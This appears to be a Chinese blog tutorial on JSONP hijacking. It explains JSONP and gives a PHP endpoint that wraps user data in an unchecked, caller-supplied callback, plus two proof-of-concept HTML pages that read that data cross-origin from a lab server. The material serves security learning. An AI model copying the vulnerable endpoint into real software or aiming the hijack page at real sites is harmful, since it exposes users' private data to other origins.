关于jsonp劫持

作者: 原来是老王 | 来源:发表于2019-07-05 14:19 被阅读3次

关于jsonp

JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 <script></script>元素标签,远程调用 JSON 文件来实现数据传递。如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ):

{"id" : "1","name" : "原来是老王"}

那么他们可以首先通过 JSONP 的“ Padding ”这个 getUsers.JSON 输出为:

callback({"id" : "1","name" : "原来是老王"});

对于实际应用过程中 callback 的名称在后台实现是动态输出的。如上面例子在 PHP 实现:

<?php
//getUsers.php
$callback = $_GET['callback'];
print $callback.'({"id" : "1","name" : "原来是老王"});';
?>

然后在 a.com 使用 <script> 进行远程调用,在 Jquery 里可以直接这样调用:

<script type="text/javascript" src="http://mini.jiasule.com/framework/jquery/1.9.1/jquery-1.9.1.js"></script>
<script type="text/javascript">
    $.getJSON("http://www.b.com/getUsers.php?callback=?", function(getUsers){
          alert(getUsers.name);
    });
</script>

JSONP劫持漏洞实例

getUser.php
<?php
header('Content-type: application/json');
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名
//json数据
//$json_data = '["id","user"]';
$json_data='({"id":"1","name":"原来是老王"})';
echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格式的数据
?>
客户端实现 callbackFunction 函数实现劫持
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持测试</title>
</head>
<body>
<script type="text/javascript">
function callbackFunction(result)
        {
            alert(result.name);
        }
</script>
<script type="text/javascript" src="http://10.10.10.113/jsonp/getUser.php?jsoncallback=callbackFunction"></script>
</body>
</html>
jQuery 使用 JSONP
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>JSONP劫持测试</title>
    <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>    
</head>
<body>
<div id="divCustomers"></div>

<script type="text/javascript">    
    $.getJSON("http://10.10.10.113/jsonp/getUser.php?jsoncallback=?", function(getUsers){
          alert(getUsers.name);
    });
</script>
</body>
</html>

相关文章

  • 关于jsonp劫持

    关于jsonp JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资...

  • JSONP绕过CSRF防护token

    第一次遇到了jsonp劫持漏洞,并且通过此漏洞绕过token进行成功的csrf攻击 JSONP 什么是jsonp?...

  • JSONP的劫持

    关于 JSONP JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求...

  • 浅谈跨域劫持

    关闭页面特效 本篇文章主要讲解一下跨域攻击: Jsonp劫持 Flash跨域劫持 CORS跨域资源获取 -----...

  • 前端 JSONP 原理及 Node 模拟 JSONP

    1、关于 JSONP 请求的注意项 a、JSONP 请求只支持 GET 形式 b、JSONP 请求返回的是一个自定...

  • 初识Jsonp跨域劫持漏洞

    本文仅作学习记录,如有侵权,请联系删除! 0x01 前言: 我最开始接触安全的时候,有阅读过跟跨域漏洞相关的技术文...

  • 关于JSONP

    用 img 发送请求 只能用 get 方法,只能以图片的形式展示 后台 用 script 方法请求 script ...

  • jsonp原理

    什么是JSONP? 先说说JSONP是怎么产生的: 其实网上关于JSONP的讲解有很多,但却千篇一律,而且云里雾里...

  • 关于JSONP技术

    0,什么是数据库?文件系统是数据库,MYSQL是数据库,MYSQL是一个软件,用来做数据库。 1.先简单了解一下后...

  • 黑帽SEO技术汇总

    劫持:域名劫持、网页劫持、PR劫持、公关劫持、蜘蛛劫持、服务端劫持、客户端劫持、快照劫持 站群:常规站群、泛站群、...

网友评论

    本文标题:关于jsonp劫持

    本文链接:https://www.haomeiwen.com/subject/idtehctx.html